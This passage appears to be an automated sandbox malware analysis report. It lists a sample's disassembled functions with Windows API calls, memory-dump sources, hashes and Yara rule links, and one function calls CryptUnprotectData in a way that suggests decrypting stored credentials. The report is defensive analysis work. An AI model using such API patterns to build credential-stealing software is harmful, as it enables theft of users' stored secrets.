                                • Opcode ID: 0246997eb0d55240648c6bcef4ad827630e2b79d41f780e45ad020787866c249
                                • Instruction ID: ce03052f59c06075c01a7d52b1639073757275aaf7a10d2330ff7a726838990f
                                • Opcode Fuzzy Hash: 0246997eb0d55240648c6bcef4ad827630e2b79d41f780e45ad020787866c249
                                • Instruction Fuzzy Hash: FA72D3F360C2009FE304AE29EC8567ABBE5EF94720F1A893DE6C4C3744EA7558058796
                                Function 00C43720 Relevance: 4.6, APIs: 3, Instructions: 100comCOMMON
                                Download Yara Rule
                                APIs
                                • CoCreateInstance.COMBASE(00C4E118,00000000,00000001,00C4E108,00000000), ref: 00C43758
                                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 00C437B0
                                Memory Dump Source
                                • Source File: 00000000.00000002.1310468035.0000000000C31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                • Associated: 00000000.00000002.1310379765.0000000000C30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000CE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000CED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000D12000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000E7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001014000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.00000000010EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001110000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001117000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001126000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1311295036.0000000001127000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1311460333.00000000012BB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: ByteCharCreateInstanceMultiWide
                                • String ID:
                                • API String ID: 123533781-0
                                • Opcode ID: b884813e474bc5cbd18da02f791658eec19873ef38c21540c6b191b749d71cf5
                                • Instruction ID: 9797de6c42d11033f88b4def1076d3a683dea2d38cfcd45e1a4beae4cc539ad5
                                • Opcode Fuzzy Hash: b884813e474bc5cbd18da02f791658eec19873ef38c21540c6b191b749d71cf5
                                • Instruction Fuzzy Hash: 35410770A40A289FDB24DB58CC94B9BB7B4BB88702F4041D9E608E72D0E771AEC5CF50
                                Function 00C39B60 Relevance: 4.6, APIs: 3, Instructions: 51memoryencryptionCOMMON
                                Download Yara Rule
                                APIs
                                • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00C39B84
                                • LocalAlloc.KERNEL32(00000040,00000000), ref: 00C39BA3
                                • LocalFree.KERNEL32(?), ref: 00C39BD3
                                Memory Dump Source
                                • Source File: 00000000.00000002.1310468035.0000000000C31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                • Associated: 00000000.00000002.1310379765.0000000000C30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000CE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000CED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000D12000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000E7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001014000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.00000000010EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001110000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001117000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001126000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1311295036.0000000001127000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1311460333.00000000012BB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Local$AllocCryptDataFreeUnprotect
                                • String ID:
                                • API String ID: 2068576380-0
                                • Opcode ID: 68b523be26f6e53e0d180e10db2724291736f8027ed62db00255908e869cac8c
                                • Instruction ID: ee4d6aff26a0833f90c78d3bb17cfb33b1ee23f9a39e33341bcc48f3190f2481
                                • Opcode Fuzzy Hash: 68b523be26f6e53e0d180e10db2724291736f8027ed62db00255908e869cac8c
                                • Instruction Fuzzy Hash: AB110CB8A00209DFCB04DF94D989AAEB7B9FF88300F1045A8E915A7350D770AE54CFA1
                                Function 00FF84AA Relevance: 4.1, Strings: 2, Instructions: 1590COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1310601504.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                • Associated: 00000000.00000002.1310379765.0000000000C30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000C31000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000CE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000CED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000D12000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000E7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001014000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.00000000010EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001110000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001117000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001126000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1311295036.0000000001127000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1311460333.00000000012BB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: <9n$w>;
                                • API String ID: 0-2891070851
                                • Opcode ID: 9a184014fe9d83f52940ee589af46ffe495134456585e6cf7a8bc6b7e2f37337
                                • Instruction ID: b0c5ad3a6fe5b32273dcf2714b8b470c60f4a9137ab19abe34777f44eb19f672
                                • Opcode Fuzzy Hash: 9a184014fe9d83f52940ee589af46ffe495134456585e6cf7a8bc6b7e2f37337
                                • Instruction Fuzzy Hash: E4B2E5F36082049FE7046E2DEC8577ABBE9EF94720F1A453DEAC4C3744EA3598058697
                                Function 00FFB9B6 Relevance: 4.1, Strings: 2, Instructions: 1566COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1310601504.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                • Associated: 00000000.00000002.1310379765.0000000000C30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000C31000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000CE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000CED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000D12000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000E7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001014000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.00000000010EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001110000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001117000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001126000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1311295036.0000000001127000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1311460333.00000000012BB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: +s}$!U{u
                                • API String ID: 0-12891374
                                • Opcode ID: 36eec9c3b93f74fad34bbb2d33c505dc826396c531da0f00d4a947d234d90fdc
                                • Instruction ID: 9d6cf8fcd6b1daaf6541a01a3b692f72fdc62f23a7fae53f7ff7310d15faa396
                                • Opcode Fuzzy Hash: 36eec9c3b93f74fad34bbb2d33c505dc826396c531da0f00d4a947d234d90fdc
                                • Instruction Fuzzy Hash: C8B2E0F2A0C6049FE304AF29EC8567AFBE9EF94320F16893DE6C4C7344E63558458697
                                Function 00FFD4AF Relevance: 4.0, Strings: 2, Instructions: 1470COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1310601504.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                • Associated: 00000000.00000002.1310379765.0000000000C30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000C31000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000CE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000CED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000D12000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000E7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001014000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.00000000010EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001110000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001117000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001126000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1311295036.0000000001127000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1311460333.00000000012BB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: O'y$k;~g
                                • API String ID: 0-2522017536
                                • Opcode ID: 1236f9b310e23d04095f7d63cb2e9cd478adc496496c054c636a819ebc21189d
                                • Instruction ID: 12e30bc067cec554b7723e8208614f0a0d0b1ee9ada19d8d1cf509e3143e79c8
                                • Opcode Fuzzy Hash: 1236f9b310e23d04095f7d63cb2e9cd478adc496496c054c636a819ebc21189d
                                • Instruction Fuzzy Hash: 8BA209F3A08200AFE304AE2DEC8567ABBE9EFD4720F1A853DE6C4C7744E57558058697
                                Function 00F7A52D Relevance: 2.8, Strings: 2, Instructions: 271COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1310601504.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                • Associated: 00000000.00000002.1310379765.0000000000C30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000C31000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000CE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000CED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000D12000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000E7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001014000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.00000000010EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001110000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001117000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001126000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1311295036.0000000001127000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1311460333.00000000012BB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: n!S${O'
                                • API String ID: 0-3851219209
                                • Opcode ID: 90a3a296203a77dcf0c1d067c40b6a943463829a50ec0db3f27fd57ce8792014
                                • Instruction ID: a96d693dbc480c6cf4f0466804774de6ae7952808f4591268fd0f48858ef3c84
                                • Opcode Fuzzy Hash: 90a3a296203a77dcf0c1d067c40b6a943463829a50ec0db3f27fd57ce8792014
                                • Instruction Fuzzy Hash: 058107B3A0C2049FE308AE2ADC4577AB7DAEBD4320F1A863DE5C5C7744EA3558468652
                                Function 0109FBC0 Relevance: 2.6, Strings: 2, Instructions: 85COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1310601504.0000000001014000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                • Associated: 00000000.00000002.1310379765.0000000000C30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000C31000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000CE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000CED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000D12000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000E7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.00000000010EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001110000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001117000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001126000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1311295036.0000000001127000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1311460333.00000000012BB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: _`\m$~/
                                • API String ID: 0-1952511750
                                • Opcode ID: e025391c6e161d79729769221214a40b2d80932974508e5efcf7a2e0c597ced8
                                • Instruction ID: b2aac87ac82761acc2d63e43d076de95bbd3d26b3a2f12faef3fb6d0e34c2d3f
                                • Opcode Fuzzy Hash: e025391c6e161d79729769221214a40b2d80932974508e5efcf7a2e0c597ced8
                                • Instruction Fuzzy Hash: FB31E5B250D300EFE746AE14D881ABAFBE8FF58311F16092DE6C593250E7359880CB97
                                Function 0100303F Relevance: 1.8, Strings: 1, Instructions: 573COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1310601504.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                • Associated: 00000000.00000002.1310379765.0000000000C30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000C31000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000CE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000CED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000D12000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000E7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001014000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.00000000010EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001110000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001117000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001126000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1311295036.0000000001127000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1311460333.00000000012BB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: hQ;
                                • API String ID: 0-2269190248
                                • Opcode ID: e07ca60fe70016c4dde7b86f98bd546997632782ea66250e63339c055684e461
                                • Instruction ID: 0466d1efbc94115d8834273c42c1d69c86115d22b45a7383cff8552f641c1fcd
                                • Opcode Fuzzy Hash: e07ca60fe70016c4dde7b86f98bd546997632782ea66250e63339c055684e461
                                • Instruction Fuzzy Hash: 4802F6F3608604AFE3046E2DEC81A6AF7EAEFD4760F1A493DE6C4C7744E53599018693
                                Function 00F7D8F3 Relevance: 1.5, Strings: 1, Instructions: 235COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1310601504.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                • Associated: 00000000.00000002.1310379765.0000000000C30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000C31000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000CE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000CED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000D12000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000E7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001014000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.00000000010EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001110000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001117000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001126000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1311295036.0000000001127000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1311460333.00000000012BB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: #){|
                                • API String ID: 0-824655753
                                • Opcode ID: 6b58f71fc8fb2432bb2987333ffe2c0cc700f0e4992247d18fe06dbae6d9b9e4
                                • Instruction ID: 8c696f8fcafd919be4168e10707d692d4e95de2160490a0842d60fa4fb95998a
                                • Opcode Fuzzy Hash: 6b58f71fc8fb2432bb2987333ffe2c0cc700f0e4992247d18fe06dbae6d9b9e4
                                • Instruction Fuzzy Hash: 8A7109F3E086109FE7045E2DEC8576ABBD6EBD4320F1A863DDBC897380E53958058696
                                Function 00FBA670 Relevance: 1.4, Strings: 1, Instructions: 170COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1310601504.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                • Associated: 00000000.00000002.1310379765.0000000000C30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000C31000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000CE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000CED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000D12000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000E7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001014000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.00000000010EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001110000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001117000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001126000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1311295036.0000000001127000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1311460333.00000000012BB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: b]]
                                • API String ID: 0-2059604072
                                • Opcode ID: 0b3e1cfbcb3b95d05cdb72619ecb6262e449e61a7158330de939a0819c5d2b0c
                                • Instruction ID: 094c0c6134f34aad65fa7b54183c1fce2ab7a4923c950b2c8111250e78b47dd6
                                • Opcode Fuzzy Hash: 0b3e1cfbcb3b95d05cdb72619ecb6262e449e61a7158330de939a0819c5d2b0c
                                • Instruction Fuzzy Hash: 505117B36082005FE314ED3DED4977BBBDAEBC4730F2A863DE694C7688E93458058256
                                Function 00F9FD86 Relevance: 1.4, Strings: 1, Instructions: 163COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1310601504.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                • Associated: 00000000.00000002.1310379765.0000000000C30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000C31000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000CE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000CED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000D12000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000E7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001014000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.00000000010EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001110000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001117000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001126000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1311295036.0000000001127000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1311460333.00000000012BB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: 'F
                                • API String ID: 0-682699343
                                • Opcode ID: 94fba5b7447651d7e6a7fb4e321d7a839ebff4666469cb83b9ef51dd426b5c94
                                • Instruction ID: cce77198ff41a0f564e39e19325e0fa063d2804f9e31d27d008d17eea7fa1ee2
                                • Opcode Fuzzy Hash: 94fba5b7447651d7e6a7fb4e321d7a839ebff4666469cb83b9ef51dd426b5c94
                                • Instruction Fuzzy Hash: 0351F0F360C3049FE3106E29DC8576EBBE1EB98320F06093DE7D4C3780E63958558A86
                                Function 00FCACD1 Relevance: 1.4, Strings: 1, Instructions: 154COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1310601504.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                • Associated: 00000000.00000002.1310379765.0000000000C30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000C31000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000CE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000CED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000D12000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000E7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001014000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.00000000010EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001110000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001117000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001126000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1311295036.0000000001127000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1311460333.00000000012BB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: )Q?{
                                • API String ID: 0-235534759
                                • Opcode ID: 4695142bcda3c2e0f4f2f3ba7de3260945e6efc042ba13c49ca8d5e419195a1c
                                • Instruction ID: 8b1639781d2c735cb9175e130eb8dbdadbd5e4608cfe1cd55950e36bd8b6366e
                                • Opcode Fuzzy Hash: 4695142bcda3c2e0f4f2f3ba7de3260945e6efc042ba13c49ca8d5e419195a1c
                                • Instruction Fuzzy Hash: 724169B37186041FE31C593CED67A7B76CADB94230F29413EE656D7780FD2A98014295
                                Function 00EC63E7 Relevance: .2, Instructions: 217COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.1310601504.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                • Associated: 00000000.00000002.1310379765.0000000000C30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000C31000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000CE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000CED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000D12000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000E7A000.00000040.00000001.01000000.00000003.sdmpDownload File
